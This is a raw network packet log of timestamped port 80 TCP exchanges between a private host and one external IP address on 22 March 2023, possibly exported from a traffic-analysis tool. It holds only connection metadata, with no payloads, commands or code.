Mar 22, 2023 11:21:19.039273024 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039292097 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039311886 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039303064 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.039335012 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039357901 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039366007 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.039378881 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039401054 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039402962 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.039421082 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039427996 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.039443016 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039460897 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.039464951 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039483070 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.039485931 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039508104 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039515018 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.039529085 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039541960 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.039550066 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039571047 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039578915 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.039597988 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039607048 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.039624929 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039639950 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.039653063 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039674044 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.039679050 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039702892 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039705992 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.039724112 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039729118 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.039745092 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039757967 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.039766073 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039777994 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.039786100 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039803982 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.039808989 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039824963 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.039833069 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039846897 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.039855003 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039872885 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.039876938 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039896011 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.039897919 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039918900 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039921045 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.039940119 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039951086 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.039964914 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039985895 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.039987087 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040007114 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040019035 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040028095 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040054083 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040065050 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040086031 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040088892 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040107965 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040122986 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040128946 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040149927 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040153980 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040172100 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040184021 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040193081 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040214062 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040219069 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040235043 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040251017 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040256023 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040277958 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040287971 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040297985 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040318012 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040332079 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040342093 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040352106 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040364027 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040384054 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040393114 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040404081 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040411949 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040425062 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040443897 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040450096 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040463924 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040483952 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040488005 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040503025 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040512085 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040524006 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040544033 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040550947 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040565968 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040585041 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040585041 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040606976 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040610075 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040631056 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040638924 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040649891 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040661097 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040671110 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040684938 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040697098 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040707111 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040719032 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040730000 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040739059 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040752888 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040760040 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040776014 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040781975 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040801048 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040802002 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040822983 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040838957 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040841103 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040859938 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040868044 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040882111 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040900946 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040920973 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040925026 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040925026 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040941954 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040952921 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.040966034 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.040978909 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.041013002 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.041640043 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.041711092 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.041733027 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.041769981 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.041789055 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.041790962 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.041810989 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.041815042 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.041832924 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.041838884 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.041857958 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.041862965 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.041883945 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.041887999 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.041913986 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.041918039 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.041937113 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.041943073 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.041964054 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.041966915 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.041985989 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.041990042 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.042005062 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.042009115 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.042028904 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.042052984 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.042764902 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.042789936 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.042810917 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.042824030 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.042834997 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.042848110 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.042861938 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.042870045 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.042890072 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.042891979 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.042916059 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.042918921 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.042941093 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.042949915 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.042979956 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.042980909 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.042994022 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.043011904 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.043035984 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.043040037 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.043050051 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.043067932 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.043078899 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.043112040 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.044047117 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.044074059 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.044094086 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.044102907 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.044118881 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.044126987 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.044147968 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.044150114 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.044171095 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.044177055 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.044192076 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.044194937 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.044212103 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.044219971 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.044234037 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.044240952 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.044255018 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.044266939 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.044274092 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.044291019 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.044294119 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.044313908 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.044332981 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.044336081 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.044358969 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.044465065 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.045833111 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.045862913 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.045881987 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.045900106 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.045901060 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.045923948 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.045924902 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.045945883 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.045962095 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.045965910 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.045986891 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.045989037 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.046009064 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.046019077 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.046029091 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.046040058 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.046049118 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.046063900 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.046070099 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.046088934 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.046089888 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.046122074 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.046152115 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.047039032 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.047064066 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.047084093 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.047096968 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.047105074 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.047125101 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.047133923 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.047146082 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.047166109 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.047173023 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.047194958 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.047241926 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.047261000 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.047288895 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.047318935 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.047350883 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.047374964 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.047390938 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.047401905 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.047426939 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.047429085 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.047461033 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.047489882 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.048281908 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.048310041 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.048336983 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.048362970 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.048367023 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.048388004 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.048396111 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.048415899 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.048434019 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.048472881 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.049964905 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.049993038 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.050012112 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.050036907 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.050090075 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.050129890 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.050148010 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.050174952 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.050237894 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.050240040 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.050292015 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.050350904 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.050400019 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.050431967 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.050486088 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.050630093 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.050647020 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.050684929 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.050735950 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.050748110 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.050767899 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.050806046 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.050843000 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.050863981 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.050879002 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.050914049 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.050940990 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.050976038 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.050992966 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.051081896 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.051098108 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.051096916 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.051098108 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.051126003 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.051153898 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.051244974 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.051295042 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.051335096 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.051372051 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.051382065 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.051424026 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.051444054 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.051482916 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.051487923 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.051531076 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.051712990 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.051769972 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.051789999 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.051841021 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.051893950 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.051934958 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.051939011 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.051981926 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.052381039 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.052439928 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.052500010 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.052520990 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.052541018 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.052546978 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.052580118 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.052597046 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.052602053 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.052659035 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.054915905 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.054945946 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.054969072 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.054994106 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.055016994 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.055028915 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.055042028 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.055068970 CET	80	49694	85.31.45.22	192.168.2.5
